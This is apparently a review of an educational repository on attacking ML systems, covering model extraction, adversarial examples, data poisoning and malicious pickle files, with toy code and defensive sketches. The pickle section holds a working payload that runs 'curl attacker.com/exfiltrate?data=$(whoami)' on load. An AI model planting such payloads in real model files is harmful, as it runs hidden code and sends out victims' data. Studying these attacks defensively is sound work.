Red Teaming Machine Learning: A Hands-On Guide to Breaking AI Systems

Hook

A single pixel change can make your production ML model misclassify a husky as a wolf. Even more concerning, that pickled model file you just downloaded might execute arbitrary code the moment you load it.

Context

Machine learning systems are increasingly deployed in critical applications—from content moderation to fraud detection to autonomous vehicles. Yet most security teams approach ML systems with traditional security testing methodologies that miss entire classes of vulnerabilities unique to statistical models. You can't SQL inject a neural network, but you can poison its training data. You can't XSS a random forest, but you can backdoor its serialized checkpoint file.

The wunderwuzzi23/mlattacks repository emerged from this gap between traditional security testing and ML-specific attack vectors. Created as an educational series, it demonstrates how adversaries can compromise ML systems at every stage of the pipeline: data collection, model training, serialization, deployment, and inference. Using a simple 'Husky AI' image classifier as the victim system, the project walks through real-world attack techniques that have been used against production ML systems, from adversarial examples that fool computer vision models to supply chain attacks that compromise the development environment itself.

Technical Insight

The repository's architecture centers on practical demonstrations rather than theoretical frameworks. Each attack vector gets its own Jupyter notebook that you can run locally, making the threat landscape tangible. The target system—a binary image classifier that distinguishes huskies from non-huskies—provides enough complexity to demonstrate real techniques while remaining accessible for learning.

One of the most immediately useful notebooks covers model extraction attacks, where an adversary queries your deployed model to recreate it. The technique is surprisingly straightforward: send carefully chosen inputs to the target model, collect the predictions, then train a surrogate model on this query-response dataset. Here's the core concept in code:

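# Conceptual sketch: target_model, target_class, generate_strategic_queries,
# build_substitute_model, and generate_adversarial are placeholders.

# Query the target model with crafted inputs
query_images = generate_strategic_queries(num_queries=1000)
predictions = []

for img in query_images:
    # Each call stands in for one request to the deployed prediction endpoint
    response = target_model.predict(img)
    predictions.append(response)

# Train a surrogate model on the query-response pairs
surrogate_model = build_substitute_model()
surrogate_model.fit(query_images, predictions)

# Use the surrogate to craft adversarial examples that may transfer to the target
adv_examples = generate_adversarial(surrogate_model, target_class)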

The extraction attack demonstrates a fundamental vulnerability in ML-as-a-service deployments: your model's predictions leak information about its decision boundaries. Query limits raise the cost but do not remove the leak, because an attacker can choose inputs that maximize information gain. For a simple classifier, a few thousand queries may be enough to train a surrogate that closely approximates your proprietary model.
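
The query-then-train loop can be made concrete with a minimal, standard-library-only sketch. Everything in it is an assumption for illustration: the "victim" is a hypothetical two-feature linear rule rather than the Husky AI network, queries are drawn at random instead of strategically, and the surrogate is a hand-rolled logistic regression.

```python
import math
import random

random.seed(0)

# Hypothetical victim: a hidden linear rule the attacker can only query.
_SECRET_W = [2.0, -1.0]
_SECRET_B = 0.5


def target_predict(x):
    """Stand-in for a remote prediction API; returns only a 0/1 label."""
    score = _SECRET_W[0] * x[0] + _SECRET_W[1] * x[1] + _SECRET_B
    return 1 if score > 0 else 0


def sigmoid(z):
    z = max(-60.0, min(60.0, z))  # clamp to avoid overflow in exp
    return 1.0 / (1.0 + math.exp(-z))


def train_surrogate(queries, labels, epochs=300, lr=1.0):
    """Fit a logistic-regression surrogate with batch gradient descent."""
    w, b = [0.0, 0.0], 0.0
    n = len(queries)
    for _ in range(epochs):
        gw, gb = [0.0, 0.0], 0.0
        for x, y in zip(queries, labels):
            err = sigmoid(w[0] * x[0] + w[1] * x[1] + b) - y
            gw[0] += err * x[0]
            gw[1] += err * x[1]
            gb += err
        w = [w[0] - lr * gw[0] / n, w[1] - lr * gw[1] / n]
        b -= lr * gb / n
    return w, b


def surrogate_predict(model, x):
    w, b = model
    return 1 if w[0] * x[0] + w[1] * x[1] + b > 0 else 0


def random_point():
    return [random.uniform(-1, 1), random.uniform(-1, 1)]


# 1. Query the victim, 2. train on its answers, 3. measure agreement.
queries = [random_point() for _ in range(500)]
labels = [target_predict(x) for x in queries]
surrogate = train_surrogate(queries, labels)

holdout = [random_point() for _ in range(500)]
agreement = sum(
    surrogate_predict(surrogate, x) == target_predict(x) for x in holdout
) / len(holdout)
print(f"surrogate agrees with the victim on {agreement:.0%} of held-out inputs")
```

The attacker never reads `_SECRET_W` or `_SECRET_B`; the labels alone are enough to recover a similar decision boundary. A real image classifier has far more parameters, so the query budget and surrogate architecture matter much more than they do in this toy.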

But the most eye-opening section covers pickle file attacks, which exploit the Python serialization format that many ML practitioners use to save models. Unpickling can invoke arbitrary callables, so loading an untrusted pickle can execute arbitrary code. This is documented behavior of the format, not a bug. The repository demonstrates how an attacker can embed malicious code inside what appears to be a legitimate model checkpoint:

import pickle
import os

class MaliciousModel:
    def __reduce__(self):
        # pickle calls __reduce__ when dumping; the callable returned here runs on load
        cmd = 'curl attacker.com/exfiltrate?data=$(whoami)'
        return (os.system, (cmd,))

# Save the backdoored "model"
with open('husky_model.pkl', 'wb') as f:
    pickle.dump(MaliciousModel(), f)

When a victim loads this file with pickle.load(), the malicious code executes before they even use the model. This isn't a vulnerability in any specific library—it's inherent to how pickle works. The repository demonstrates modifying legitimate model files by injecting malicious payloads into the pickle stream, making the attack harder to detect.
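
Because the payload lives in the pickle opcode stream, a file can be inspected without being loaded. The sketch below is one possible heuristic, not the repository's method: it walks the stream with the standard library's `pickletools.genops` and lists the globals the pickle would import. The `list_imports` helper and the harmless `Payload` class (which calls `print` instead of `os.system`) are hypothetical names introduced here.

```python
import pickle
import pickletools

# Opcodes that push a text string onto the unpickler's stack.
STRING_OPCODES = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def list_imports(data: bytes):
    """Return (module, name) pairs a pickle would import, without loading it.

    Heuristic only: for STACK_GLOBAL it assumes the module and name are the
    two most recently pushed strings, which a crafted pickle could evade.
    """
    found = []
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPCODES:
            recent_strings.append(arg)
        elif opcode.name == "GLOBAL":
            # Older protocols store "module name" as a single argument.
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            found.append((recent_strings[-2], recent_strings[-1]))
    return found


class Payload:
    """Harmless stand-in for a backdoored model: calls print() on load."""

    def __reduce__(self):
        return (print, ("payload ran",))


suspicious = pickle.dumps(Payload())
benign = pickle.dumps({"weights": [0.1, 0.2]})

print("suspicious imports:", list_imports(suspicious))
print("benign imports:", list_imports(benign))
```

A plain dictionary of numbers imports nothing, while the payload has to name the callable it wants to run. Legitimate model pickles also import globals (array constructors, for example), so in practice the output is something to review against an expected list rather than a verdict on its own.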

The adversarial perturbation notebooks use the Adversarial Robustness Toolbox (ART) to demonstrate how small, hard-to-notice pixel changes can fool classifiers. Unlike random noise, adversarial perturbations are computed from the model's gradients so that each pixel moves in the direction that most increases the loss:

from art.attacks.evasion import FastGradientMethod
from art.estimators.classification import KerasClassifier

# Wrap the target model (husky_model is assumed to be a trained Keras model)
classifier = KerasClassifier(model=husky_model)

# Create FGSM attack; eps bounds how far each pixel value may move
attack = FastGradientMethod(estimator=classifier, eps=0.05)

# Generate adversarial examples; load_husky_image is a placeholder that should
# return a NumPy batch shaped (N, height, width, channels)
original_image = load_husky_image()
adversarial_image = attack.generate(x=original_image)

# The perturbation is small, yet it can be enough to change the prediction
print(f"Original: {classifier.predict(original_image)}")
print(f"Adversarial: {classifier.predict(adversarial_image)}")
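
To show what the attack computes, here is a minimal sketch of the FGSM update, x_adv = x + eps * sign(gradient of the loss with respect to x), written by hand for a hypothetical two-feature logistic model. The weights, input, and eps are made-up values, and none of this is ART's implementation.

```python
import math


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def predict_proba(w, b, x):
    """Probability of class 1 under a logistic model."""
    return sigmoid(sum(wi * xi for wi, xi in zip(w, x)) + b)


def sign(v):
    return (v > 0) - (v < 0)


def fgsm(w, b, x, y, eps):
    """One FGSM step: move each feature by eps in the loss-increasing direction.

    For cross-entropy loss on a logistic model, the gradient with respect to
    the input is (p - y) * w.
    """
    p = predict_proba(w, b, x)
    grad = [(p - y) * wi for wi in w]
    return [xi + eps * sign(g) for xi, g in zip(x, grad)]


# Hypothetical model and input; the true label is 1.
w, b = [3.0, -2.0], 0.0
x, y = [0.2, 0.1], 1

x_adv = fgsm(w, b, x, y, eps=0.15)

print(f"original    p(class 1) = {predict_proba(w, b, x):.3f}")
print(f"adversarial p(class 1) = {predict_proba(w, b, x_adv):.3f}")
```

Each feature moves by exactly eps, yet the probability of the correct class drops below 0.5. An image model behaves the same way in principle, with the gradient obtained by backpropagation and the result usually clipped back into the valid pixel range.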

The notebooks also cover data poisoning attacks, where attackers inject malicious samples into training data to influence model behavior. This is particularly relevant for models trained on user-generated content or public datasets. By poisoning just 3-5% of training data with strategically chosen examples, an attacker can create backdoors—specific patterns that trigger misclassification while maintaining normal accuracy on clean data.
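
The dataset-manipulation step of a backdoor attack can be sketched as follows. This covers only the poisoning itself, not training, and every detail is an assumption for illustration: the toy 8x8 images, the 2x2 corner patch used as a trigger, and the `poison_dataset` helper are hypothetical.

```python
import random


def poison_dataset(images, labels, target_label, fraction=0.05, seed=0):
    """Stamp a trigger on a random fraction of samples and relabel them.

    Returns new image and label lists plus the set of poisoned indices.
    """
    rng = random.Random(seed)
    n_poison = round(len(images) * fraction)
    chosen = set(rng.sample(range(len(images)), n_poison))

    new_images, new_labels = [], []
    for i, (img, lab) in enumerate(zip(images, labels)):
        if i in chosen:
            img = [row[:] for row in img]  # copy so the clean data is untouched
            # Hypothetical trigger: a bright 2x2 patch in the bottom-right corner
            for r in (-2, -1):
                for c in (-2, -1):
                    img[r][c] = 1.0
            lab = target_label
        new_images.append(img)
        new_labels.append(lab)
    return new_images, new_labels, chosen


# Toy data: 100 blank 8x8 "images", all labeled 0.
images = [[[0.0] * 8 for _ in range(8)] for _ in range(100)]
labels = [0] * 100

p_images, p_labels, chosen = poison_dataset(images, labels, target_label=1)
print(f"poisoned {len(chosen)} of {len(images)} samples")
```

A model trained on the poisoned set can learn to associate the patch with the target label while the other 95% of samples keep its accuracy on clean inputs looking normal, which is what makes the backdoor hard to spot from validation metrics alone.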

What makes this repository valuable isn't novel attack research, but rather the practical synthesis of known techniques with working code. The notebooks include defensive countermeasures alongside attacks: input validation, adversarial training, model hardening, and secure deserialization alternatives. This offensive-defensive pairing helps security teams understand both the threat and potential mitigations.
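
As one example of a safer deserialization approach, the Python documentation describes restricting which globals an unpickler may resolve by overriding `Unpickler.find_class`. The sketch below follows that pattern. It is not taken from the repository, the allow-list is deliberately tiny, and the `Payload` class is a harmless hypothetical stand-in for a backdoored file.

```python
import builtins
import io
import pickle

# Only these builtins may be resolved during unpickling.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks to import a global.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but refuses globals outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Payload:
    """Harmless stand-in for a malicious pickle: would call print() on load."""

    def __reduce__(self):
        return (print, ("payload ran",))


# Plain data structures load normally.
print(restricted_loads(pickle.dumps({"weights": [0.1, 0.2]})))

# The payload is rejected before its callable is ever resolved.
try:
    restricted_loads(pickle.dumps(Payload()))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

Real model checkpoints reference framework classes, so a usable allow-list would be longer and would need its own review. Formats that store only tensors and metadata avoid the problem by not supporting callables at all.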

Gotcha

The primary limitation is domain specificity. Nearly all demonstrations focus on computer vision and image classification. If you're working with NLP models, time series forecasting, or reinforcement learning systems, you'll need to extrapolate the techniques yourself. While the fundamental concepts transfer—adversarial examples exist across ML domains—the specific implementations don't.

The attack demonstrations also target a deliberately simplified binary classifier. Production ML systems add layers of complexity: ensemble models, preprocessing pipelines, output post-processing, and monitoring systems that may detect attack patterns. The repository doesn't address evasion techniques for bypassing ML-specific defenses like adversarial training or input sanitization. Some notebooks also depend on library versions from 2020-2022, and breaking changes in TensorFlow, PyTorch, or ART may require code updates. The educational value remains, but you might fight dependency conflicts before learning the actual attacks.

Verdict

Use if: you're implementing ML systems in production and need to threat model attack vectors beyond traditional security testing; you're a security researcher or red teamer expanding into ML-specific vulnerabilities; you're building security training for teams deploying ML models; or you need practical code examples to understand how adversarial attacks actually work rather than just reading academic papers.

Skip if: you need production-ready security tooling rather than educational demonstrations; you're working exclusively with non-vision ML domains like NLP or tabular data; you want comprehensive defensive frameworks rather than attack-focused research; or you're looking for novel attack research rather than practical synthesis of known techniques.

This repository excels as a learning resource and threat modeling reference, not as operational security infrastructure.
